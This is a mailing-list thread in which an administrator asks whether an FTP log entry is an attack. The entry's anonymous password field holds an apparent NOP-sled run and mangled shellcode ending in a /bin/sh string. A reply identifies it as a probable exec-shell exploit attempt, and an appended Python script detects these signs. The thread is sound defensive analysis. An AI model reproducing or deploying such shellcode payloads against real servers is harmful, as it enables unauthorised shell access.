Luis José Fabbiani B. (SOPORTE) wrote:
Hi, my server registered the following entry:
Jan 11 06:02:36 cumana in.ftpd[23016]: connect from pedro@150.185.69.34
Jan 11 06:02:36 cumana ftpd[23016]: connection from complex.ciens.ucv.ve
Jan 11 06:02:37 cumana ftpd[23016]: ANONYMOUS FTP LOGIN FROM complex.ciens.ucv.ve ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P1Ŕ1Ű1É°FÍ~@1Ŕ1ŰC~IŮA°?Í~@ëk^1Ŕ1É~M^^A~HF^Dfš˙^A°'Í~@1Ŕ~M^^ A°=Í~@1Ŕ1Ű~M^^H~IC^B1ÉţÉ1Ŕ~M^^H°^LÍ~@ţÉuó1Ŕ~HF^I~M^^H°=Í~@ţ^N°0ţČ~HF^D1Ŕ~HF^ G~Iv^H~IF^L~Ió~MN^H~MV^L°^KÍ~@1Ŕ1Ű°^AÍ~@č~P˙˙˙0bin0sh1..11
Is this message a possible attack?
Thanks.
Luis.
---------------------------------------------------------------------
To unsubscribe, e-mail: suse-security-unsubscribe@suse.com
For additional commands, e-mail: suse-security-help@suse.com
Yes... Or somebody wanted you to be scared or something. Anyway, there is a /bin/sh string visible in the last line - a sign that this was probably an exec(/bin/sh) try...
Grzegorz Prokopski
PS: Anyway, you should check the consistency of your filesystem after all... and the logs. But probably somebody tried to use an exploit for another ftp daemon than yours (or an older version of it). Else he probably wouldn't leave the logs.
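The signs discussed in this thread (a very long anonymous password, a repeated filler run, and a bin/sh fragment) can be checked for automatically in ftpd syslog lines. The following Python sketch is an added example, not part of the original messages; the log layout, the function names `inspect_login` and `scan`, the 64-character threshold and the sample lines are assumptions made for illustration.

```python
import re

# Assumed layout, modelled on the entry quoted in the thread:
#   "<timestamp> <host> ftpd[<pid>]: ANONYMOUS FTP LOGIN FROM <client> <password>"
LOGIN = re.compile(r"ANONYMOUS FTP LOGIN FROM (\S+)[ ,]*(.*)$", re.DOTALL)
REPEAT = re.compile(r"(.{1,2})\1{15,}", re.DOTALL)  # same 1-2 chars, 16+ times in a row
SHELL = re.compile(r"bin.{0,2}sh", re.IGNORECASE)   # "/bin/sh", "0bin0sh", ...
MAX_LEN = 64  # illustrative threshold; an anonymous password is normally an e-mail address


def inspect_login(line):
    """Return (client, reasons) for an anonymous-login line, or None for other lines."""
    m = LOGIN.search(line)
    if not m:
        return None
    client, password = m.group(1).rstrip(","), m.group(2)
    reasons = []
    if len(password) > MAX_LEN:
        reasons.append("oversized password field (%d chars)" % len(password))
    if REPEAT.search(password):
        reasons.append("long run of a repeated filler sequence")
    if SHELL.search(password):
        reasons.append("shell path fragment in password field")
    odd = sum(1 for c in password if ord(c) < 0x20 or ord(c) > 0x7E)
    if odd:
        reasons.append("%d non-printable or non-ASCII characters" % odd)
    return client, reasons


def scan(lines):
    """Yield (client, reasons) for every login line with at least one finding."""
    for line in lines:
        result = inspect_login(line.rstrip("\n"))
        if result and result[1]:
            yield result


# Constructed sample lines (not the entry from the thread; host names are placeholders).
SAMPLE = [
    "Jan 11 06:02:36 host ftpd[100]: connection from client.example",
    "Jan 11 06:02:37 host ftpd[100]: ANONYMOUS FTP LOGIN FROM client.example, user@example.org",
    "Jan 11 06:02:37 host ftpd[101]: ANONYMOUS FTP LOGIN FROM other.example "
    + "~P" * 40 + "\u00e90bin0sh",
]

if __name__ == "__main__":
    for client, reasons in scan(SAMPLE):
        print(client, "->", "; ".join(reasons))
```

A hit only shows that an attempt was logged, not whether it succeeded, so the filesystem and log review suggested in the reply is still needed.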